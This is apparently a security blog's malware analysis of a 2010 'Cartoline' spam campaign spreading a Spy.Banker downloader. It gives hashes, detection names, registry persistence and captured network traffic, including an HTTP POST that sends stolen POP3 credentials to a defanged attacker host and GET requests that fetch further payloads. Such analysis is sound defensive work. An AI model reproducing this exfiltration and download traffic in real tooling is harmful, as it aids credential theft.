Spam emails Cartoline.exe spread Spy.Banker Trojan

In recent days we have registered a new wave of spam messages with subject as “Cartoline” that looked like to come from virgilio.it, and that contained a link that appeared to redirects the user to legitimate sites such as cards.virgilio.it. After analyzing the HTML in the message, we noticed that the link could redirect to a malicious web site and that had nothing to do with virgilio.it. After clicking the malicious link, was presented the box to download a file named cartoline.exe:

Screenshot

The mere fact that an email message that promotes the postcards and redirects the user to download an executable file, it is very suspicious, and in fact the file is infected with malware:

File name: cartoline.exe
File size: 601600 bytes
MD5 hash: 92a9346604726a7d26a51d3509f806e4
SHA1 hash: 8d6817f4d365419b1cd2ac07c8035798d94d0d6e
Detection rate: 9 on 20 (45%)
Status: INFECTED

a-squared 15/05/2010 5.0.0.7 Trojan-Downloader.Win32.Banload!IK
AVG 271.1.1/2877 9.0.0.725 Downloader.Agent2.WWA
Avira AntiVir 7.10.7.111 7.6.0.59 TR/Spy.Banker.Gen
Comodo 3468 3.13.579 Heur.Pck.Enigma
F-PROT6 20100515 4.5.1.85 W32/Heuristic-DL1!Eldorado
G-Data 21.171 2.0.7309.847 Trojan-Downloader.Win32.Agent.dqkq A
Ikarus T3 16/05/2010 1.1.84.0 Trojan-Downloader.Win32.Banload
Kaspersky 16/05/2010 9.0.0.736 Trojan-Downloader.Win32.Agent.dqkq
TrendMicro 171 9.120-1004 Mal_Banker

We can see the malware activity by analyzing the log file generated with Hijack Hunter:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[+] Running processes
 
C:\windows\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603)
 
[+] Registry startups
 
Value: Win32
Data: C:\windows\wain.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
[+] Files created/modified 15 days ago
 
C:\WINDOWS\nvsvs.exe (1033216 bytes) (Unknown) (5/14/2010 7:53:34 PM) (--A-) (613feb50b850e0695c47b81a383caf28) (Created)
C:\WINDOWS\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603) (Created)
C:\WINDOWS\wilps.exe (806400 bytes) (Unknown) (5/14/2010 7:55:16 PM) (--A-) (9e78023032221f2955e95d7394531245) (Created)

Screenshot

Network traffic:

1
2
3
4
5
6
7
8
POST /images/wab.php HTTP/1.0
Host: indiegear(dot)org
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------051410195548264
Content-Disposition: form-data; name="texto"
POP3(Identi):Pass(........L.......); 
-----------------------------
----------051410195548264--

From the traffic above we can see the malware is a passwords stealer and it sent data related to a POP3 account to the malicious host through the POST query to /images/wab.php.

1
2
3
4
5
6
GET /images/heade.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: junipero(dot)com(dot)br
 
GET /IT/contador.php HTTP/1.1
Host: www.richardmata(dot)xpg(dot)com(dot)br

From the last GET query, we can see this:

Estamos com 372 visitas

It should be the total number of the users that have clicked in the malicious link present in the email and that have been infected by the malware.

1
2
3
GET /midia/list.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: mariogesteiracosta(dot)com(dot)br

As always pay attenction when reading email, even if you think the email of the sender can be legit. Remember to never click in unknown links and always analyze the html code of the email to understand better where the link can redirect.

Random Posts

Previous Posts